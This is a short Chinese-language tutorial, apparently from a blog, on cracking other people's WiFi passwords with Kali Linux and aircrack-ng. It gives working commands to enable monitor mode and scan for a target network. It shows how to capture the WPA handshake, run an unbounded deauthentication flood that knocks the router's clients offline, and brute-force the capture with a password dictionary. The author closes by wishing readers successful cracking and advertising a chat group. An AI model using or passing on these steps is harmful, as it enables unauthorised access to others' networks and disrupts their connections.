Kali破解wifi密码

Kali破解wifi密码

你将使用到,一台完整的笔记本电脑(内装有kali系统)

具体步骤:

1.进入系统-应用程序-无线攻击-aircrack-ng(这是一个评估无线网络安全的套件)

2.使用ifconfig命令检查网卡信息,找到无线网卡,这里是wlan0

3.键入命令airmon-ng start wlan0(启动无线网卡的监听模式)

4.启动后使用ifconfig检查是否成功,成功的话网卡名会加上mon,也就是wlan0

5.继续键入命令airodump-ng waln0mon(扫描周围的wifi信息,得到目标wifi的信息后ctrl+c停止扫描,下面是各个项目的意思)

a) BSSID:路由器的MAC地址

b) PWR:信号强度,越小信号越强

c) #Data:传输的数据,大的话可能在执行下载任务

d) CH:信号频道,只有在一个频道才能进行下一步操作

e) ESSID:wifi的名称,中文可能出现乱码

6.开始抓包,键入airodump-ng -c 频道号 --bssid mac地址 -w 包的储存目录 wlan0mon(网卡名称)

7.在进行第六步的同时,我们要利用deauth洪水攻击,取消目标路由和所有设备的无线连接,当设备重新连接时,会抓取到它的握手包,用这种方式来提高抓包效率,注意!!攻击一定要适可而止!!命令:aireplay-ng -0 0 -a MAC地址 wlan0mon(网卡名称)

8.抓包成功后会在右上角也就是时间的后面显示 handshake这样的信息,此后就可以ctrl+c来结束抓包了

9.接下来就是破解阶段,键入aircrack-ng -w 密码字典 /root-01.cap(握手包),回车后开始爆破

作者留言

至于要耗费多长时间或者是否爆破成功主要是取决于字典是否强大以及密码是否复杂,纯数字的密码比较普遍,组合数也不多,所以纯数字密码破解的成功率较大并且耗费时间相对较少,一般在几个小时以内,最极端的就是数字+字母+特殊字符的混合密码,破解难度较大,要想破解此类密码估计要有一台服务器24小时不间断的工作才有可能在有生之年破解成功,最后祝大家破解顺利!如有其他问题,欢迎+qq群329395408

展开阅读全文

没有更多推荐了,返回首页